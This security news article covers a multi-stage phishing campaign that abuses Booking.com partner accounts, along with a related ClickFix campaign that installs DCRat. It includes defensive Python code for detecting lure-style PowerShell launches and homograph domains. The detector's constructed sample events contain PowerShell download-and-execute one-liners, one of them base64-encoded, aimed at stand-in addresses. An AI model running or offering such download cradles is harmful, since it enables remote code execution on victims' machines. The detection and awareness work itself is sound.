
Booking.com partners abused in multi-stage phishing campaign


Attackers are compromising hotel partner accounts to pivot toward customer payment fraud.

 

What happened

A new phishing campaign is abusing the Booking.com partner platform in a coordinated fraud operation targeting both hotel staff and travelers. According to GBHackers, attackers first send phishing emails to hotel reservation or service desk inboxes while pretending to be Booking.com support messages about bookings or guest complaints. The emails link to fake websites that closely imitate the official partner login page, allowing attackers to steal staff credentials and access real booking information. Using that data, the attackers then target customers directly through WhatsApp messages that include legitimate reservation details and urgent payment requests, redirecting victims to a second phishing page designed to capture credit card information.

 

Going deeper

The attack operates in three coordinated stages. First, attackers send phishing emails from patterned Gmail accounts and from homograph domains, in which lookalike characters such as Cyrillic letters stand in for Latin ones so that a fake Booking.com link reads correctly to the eye. Second, the link leads to a phishing site that closely imitates the real Booking.com partner portal and fingerprints the visiting browser and device, serving the credential form only to likely victims while steering security scanners to harmless decoy pages. Third, once login credentials are captured, the attackers use the compromised accounts to read booking details and send guests WhatsApp payment messages that quote real reservation data. The final payment pages sit behind a Cloudflare CAPTCHA check and are pre-filled with the booking data, which makes the request look routine and lowers victims' hesitation; the same check also keeps automated crawlers from reaching the card-capture form.

 

What was said

Researchers who investigated the activity stated in their published analysis that the campaign demonstrates “a coordinated multi-stage infection chain” targeting two sequential victim groups: hotel partners and their customers. The analysis noted that the phishing infrastructure applied “root domain user fingerprinting” and strong visual impersonation of the partner portal to reduce detection and increase success rates.

 

In the know

Recently, researchers also uncovered a separate phishing campaign targeting hospitality organizations through fake Booking.com reservation messages that ultimately deploy remote access malware. In that operation, tracked as PHALT#BLYX, hotel staff received emails posing as booking cancellations that redirected them to convincing imitation pages displaying fake CAPTCHA checks and simulated system errors. Victims were told to copy and run a command to clear the error, which launched a PowerShell sequence that installed the DCRat remote access trojan. Unlike the credential theft scheme described above, the goal was persistent system access rather than immediate payment fraud. Together, the campaigns show how attackers are expanding beyond simple phishing emails, combining account compromise, social engineering, and remote access techniques to exploit trusted hospitality platforms from multiple angles.
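As an added example (not code from the article or from the PHALT#BLYX research it cites), the following triage routine runs over constructed process-creation events and flags the shape a "run this command to fix the error" lure leaves behind: PowerShell started from the Explorer shell with a hidden window, a download cradle and a remote URL, or an encoded command that decodes to one. The field names (ParentImage, Image, CommandLine) follow a Sysmon-like layout and are an assumption to be mapped onto your own EDR schema; the sample events and the 203.0.113.0/24 addresses are constructed for the example.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not the article's or the researchers' code. Event field names (ParentImage,
Image, CommandLine) follow a Sysmon-like layout and are an assumption; the sample events
below are constructed, using documentation-range addresses.
"""
import base64
import re

INTERACTIVE_PARENTS = {"explorer.exe"}          # Run dialog and desktop shell launch via explorer.exe
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Individual tells; none is malicious on its own (admins use several of them legitimately).
PATTERNS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile":      re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy":   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "eval":            re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
}
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext behind -enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event):
    image = basename(event["Image"])
    if image not in POWERSHELL:
        return {"flag": False, "reasons": [], "decoded": None}
    text = event["CommandLine"]
    decoded = decode_encoded_command(text)
    reasons = []
    if decoded is not None:
        reasons.append("encoded_command")
        text = f"{text} {decoded}"          # scan the decoded script with the same patterns
    reasons += [name for name, rx in PATTERNS.items() if rx.search(text)]
    interactive = basename(event["ParentImage"]) in INTERACTIVE_PARENTS
    if interactive:
        reasons.append("launched_from_shell")
    # A one-liner the user pasted from a web page that hides its window and pulls code off
    # the network is the lure's signature; a scheduled script with one odd flag is not.
    flag = (interactive and len(reasons) >= 3) or len(reasons) >= 4
    return {"flag": flag, "reasons": reasons, "decoded": decoded}


def triage(events):
    return [e for e in events if assess(e)["flag"]]


ENCODED_PAYLOAD = "iex (iwr http://203.0.113.10/x)"   # constructed, documentation address
EVENTS = [  # constructed sample telemetry
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr http://203.0.113.10/a.txt -UseBasicParsing)"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",        # Task Scheduler host
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\ProgramData\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},                            # user opened a console
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc "
                    + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16le")).decode("ascii")},
]

if __name__ == "__main__":
    for e in EVENTS:
        r = assess(e)
        print(f"flag={r['flag']!s:5} reasons={r['reasons']}")
```

The threshold is deliberately conservative: the scheduled inventory script trips two tells (policy bypass, no profile) and is not flagged, while both shell-launched one-liners trip five or more. Tune the parent list and thresholds against your own baseline before alerting on it.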

 

The big picture

Research published by Security Brief shows that even trusted business platforms can be exploited for cybercrime, as seen in the Booking.com phishing campaign. Instead of simply impersonating brands, attackers compromise legitimate partner accounts to make fraudulent messages appear genuine. The result is a more advanced form of social engineering, where criminals combine stolen account access, malware delivery, and the resale of login credentials into coordinated profit-driven operations. For the hospitality sector, which relies heavily on online bookings and constant communication with guests, these attacks increase the risk of financial losses and reputational harm. Security researchers note that multilayered email protection using AI and machine learning detection can help reduce the likelihood of these attacks reaching users' inboxes. Platforms such as Paubox's new inbound email security, which applies generative AI analysis to incoming messages, represent one example of how organizations are strengthening defenses against credential harvesting and phishing activity.

 

FAQs

Why are hotel partners targeted first instead of guests directly?

Compromising partner accounts provides attackers with legitimate booking data, which increases credibility when contacting customers and improves the success rate of payment fraud.

 

What is an IDN homograph domain?

An IDN homograph domain uses visually similar characters from different alphabets, such as Cyrillic letters replacing Latin ones, to create deceptive web addresses that resemble trusted brands.
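Both the "Going deeper" section and this answer turn on homograph domains. The following is an added example, not code from the article or from the researchers it cites, that checks hostnames pulled from mail links or DNS logs against a short protected-domain list: it decodes xn-- labels with the standard library's idna codec, reports labels that mix scripts, and collapses each name to the Latin "skeleton" a reader would see. The protected-domain list, the hand-picked confusables table and the sample hostnames are assumptions constructed for the example; a production tool would draw on the full Unicode confusables data.

```python
"""Flag IDN homograph and lookalike hostnames against a list of protected brand domains.

Added example, not the article's or the researchers' code. The protected list, the
confusables table (a small hand-picked subset, an assumption) and the sample hostnames
are constructed here.
"""
import unicodedata

# Assumption: the defender's own allowlist, longest-first so that a lookalike of a
# subdomain is reported as that subdomain rather than as the bare apex.
PROTECTED = ("admin.booking.com", "partner.booking.com", "booking.com")

# Characters from other scripts that render like Latin letters (subset, constructed).
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",   # Cyrillic
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u0501": "d", "\u051b": "q", "\u051d": "w", "\u04bb": "h",
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v", "\u03b9": "i",                  # Greek
    "\u0131": "i", "\u0261": "g",                                                # dotless i, script g
})


def to_unicode(host):
    """Return the Unicode form of a hostname, decoding any xn-- (Punycode) labels."""
    host = host.strip().rstrip(".").lower()
    if "xn--" not in host:
        return host
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # malformed ACE label: leave as-is so it is still inspected


def skeleton(host):
    """Collapse a hostname to the Latin string a victim would see on screen."""
    decomposed = unicodedata.normalize("NFD", host)
    stripped = "".join(ch for ch in decomposed if unicodedata.category(ch) != "Mn")  # drop accents
    return unicodedata.normalize("NFKC", stripped.translate(CONFUSABLES)).lower()


def label_scripts(host):
    """Per label, the set of scripts (taken from the Unicode character names) used by its letters."""
    return [{unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}
            for label in host.split(".")]


def analyze(host):
    uni = to_unicode(host)
    skel = skeleton(uni)
    target = next((d for d in PROTECTED if skel == d or skel.endswith("." + d)), None)
    return {
        "input": host,
        "unicode": uni,
        "skeleton": skel,
        "mixed_script": any(len(s) > 1 for s in label_scripts(uni)),
        "impersonates": target,
        # A genuine host survives skeletonisation unchanged; a lookalike does not.
        "homograph": target is not None and uni != skel,
    }


# Constructed samples: the Cyrillic-o lookalike the article describes, and its ACE form as
# it would appear in a mail link or a DNS query log.
CYRILLIC_SAMPLE = "b\u043e\u043eking.com"
PUNYCODE_SAMPLE = CYRILLIC_SAMPLE.encode("idna").decode("ascii")

if __name__ == "__main__":
    for h in ("booking.com", "partner.booking.com", CYRILLIC_SAMPLE, PUNYCODE_SAMPLE, "book\u00edng.com"):
        r = analyze(h)
        print(f"{h:28} -> {r['skeleton']:20} homograph={r['homograph']} mixed={r['mixed_script']}")
```

Note that an accented Latin variant (the bookíng.com sample) is single-script and so escapes a mixed-script rule alone; the skeleton comparison is what catches it, which is why both checks are reported.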

 

How does root domain fingerprinting help attackers?

Fingerprinting techniques analyze browser characteristics, device attributes, and behavior to filter out security researchers and automated scanners, ensuring only intended victims see the phishing portal.

 

Why is WhatsApp used in the second stage?

Messaging platforms create urgency and appear more personal, especially when attackers include accurate reservation details that make the request appear legitimate.

 

What defensive steps can hospitality businesses take?

Hotels can enforce phishing-resistant multi-factor authentication (for example FIDO2 security keys or passkeys) on partner accounts, which a lookalike login page cannot replay because the credential is bound to the real origin; alert on partner-portal logins from new devices or countries; limit which staff can read guest contact and payment details; and train front-desk staff to treat complaint- or booking-themed emails that ask them to sign in through a link with suspicion, opening the partner portal from a bookmark instead.
